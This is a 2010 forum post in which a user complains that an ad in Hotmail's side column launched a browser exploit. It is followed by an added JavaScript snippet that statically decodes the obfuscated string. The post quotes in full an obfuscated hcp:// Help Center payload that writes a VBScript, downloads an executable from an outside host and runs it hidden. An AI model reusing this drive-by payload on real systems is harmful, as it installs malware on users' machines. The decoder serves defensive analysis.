EMBEDDED Ad in Hotmail Contains Browser Exploit!!!


  • Hi Hotmail administrators,

    Please check the ads for security problems before you display them in our Hotmail side columns!!

    Today when I accessed my account--note I was NOT checking any emails yet so it wasn't from any email that I received--a warning window jumped out asking me whether to allow some script to run:


    hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c echo FileName ! @}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo url!@http://multiperforated.com/vr/exe.php-exp!HCP]key!59597fa2ed59979437c16d52ac3144d3@ >>}TEMP}/go.vbs]]echo Set objHTTP ! CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo Call objHTTP.Open(@GET@, url, False)>>}TEMP}/go.vbs]]echo objHTTP.Send>>}TEMP}/go.vbs]]echo set oStream ! createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo Const adTypeBinary ! 1 >>}TEMP}/go.vbs]]echo Const adSaveCreateOverWrite ! 2 >>}TEMP}/go.vbs]]echo Const adSaveCreateNotExist ! 1  >>}TEMP}/go.vbs]]echo oStream.type ! adTypeBinary>>}TEMP}/go.vbs]]echo oStream.open>>}TEMP}/go.vbs]]echo oStream.write objHTTP.responseBody>>}TEMP}/go.vbs]]echo oStream.savetofile FileName, adSaveCreateNotExist>>}TEMP}/go.vbs]]echo oStream.close>>}TEMP}/go.vbs]]echo set oStream ! nothing>>}TEMP}/go.vbs]]echo Set xml ! Nothing>>}TEMP}/go.vbs]]echo Set WshShell ! CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo WshShell.Run FileName, 0, True>>}TEMP}/go.vbs]]echo Set FSO ! CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo FSO.DeleteFile @}TEMP}/go.vbs@ >>}TEMP}/go.vbs|cscript }TEMP}/go.vbs>nul'.replace(/!/g, String.fromCharCode(61)).replace(/@/g, String.fromCharCode(34)).replace(/]/g, String.fromCharCode(38)).replace(/{/g, String.fromCharCode(63)).replace(/}/g, String.fromCharCode(37)).replace(/-/g, String.fromCharCode(63)));</script>

    An obvious browser exploit!!!

    At the beginning I thought it must be from somewhere else since I have always trusted Hotmail for its security. But having checked everything else I was doing (I was basically doing nothing else at that time), I decided it was from nowhere else but Hotmail!! Then guess what, I accessed my Hotmail several times again and the warning window came back! It was from an ad by https://www.nationalcar.com/. Again, this is not an ad in my email! It is an ad that you have allowed to display in the side column!!

    Please be more careful when you screen the ads!! I have put my whole life on Hotmail and I don't want to get a virus one day when I log on to my account.

    Disappointed Customer

    Tuesday, September 28, 2010 8:26 AM
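
For triage of a string like the one quoted in the post above, the chain of `.replace(/X/g, String.fromCharCode(N))` calls can be undone statically, without running any of the captured script, and the `hcp://` handler reference flagged at the same time. This is an added example, not part of the original post; the function names and the harmless sample string are constructed for illustration.

```javascript
// Added example for triage; names and sample data are constructed, not from the post.
// Statically undoes a chain of .replace(/X/g, String.fromCharCode(N)) calls
// without evaluating any of the captured script.

// Extract [character, replacement] pairs in the order the chain applies them.
function extractSubstitutions(source) {
  const re = /\.replace\(\/\\?(.)\/g,\s*String\.fromCharCode\((\d+)\)\)/g;
  const pairs = [];
  for (const m of source.matchAll(re)) {
    pairs.push([m[1], String.fromCharCode(Number(m[2]))]);
  }
  return pairs;
}

// Apply the pairs sequentially, as the browser would have, using split/join
// so that no character is treated as a regular-expression metacharacter.
function applySubstitutions(text, pairs) {
  return pairs.reduce((acc, [from, to]) => acc.split(from).join(to), text);
}

// Pull the single-quoted argument that the replace chain is attached to.
function quotedArgument(source) {
  const m = source.match(/'([^']*)'\s*\.replace\(/);
  return m ? m[1] : null;
}

function triage(source) {
  const pairs = extractSubstitutions(source);
  const arg = quotedArgument(source);
  return {
    usesHcpScheme: /hcp:\/\//i.test(source),
    hasScriptTag: /<script\b/i.test(source),
    substitutions: pairs,
    decoded: arg === null ? null : applySubstitutions(arg, pairs),
  };
}

// Constructed sample: same encoding scheme as the quoted string, harmless content.
const SAMPLE =
  "hcp://services/search?query=x&topic=hcp://system/x.htm%u003fsvr=" +
  "<script defer>Run('cmd /c echo url!@http://example.invalid/a-b!c@ " +
  ">>}TEMP}/note.txt]]echo done'" +
  ".replace(/!/g, String.fromCharCode(61))" +
  ".replace(/@/g, String.fromCharCode(34))" +
  ".replace(/]/g, String.fromCharCode(38))" +
  ".replace(/}/g, String.fromCharCode(37))" +
  ".replace(/-/g, String.fromCharCode(63)));</script>";

console.log(triage(SAMPLE).decoded);
```

The decoded text shows the readable command line, so the download URL and file names hidden behind the substitution characters can be extracted as indicators.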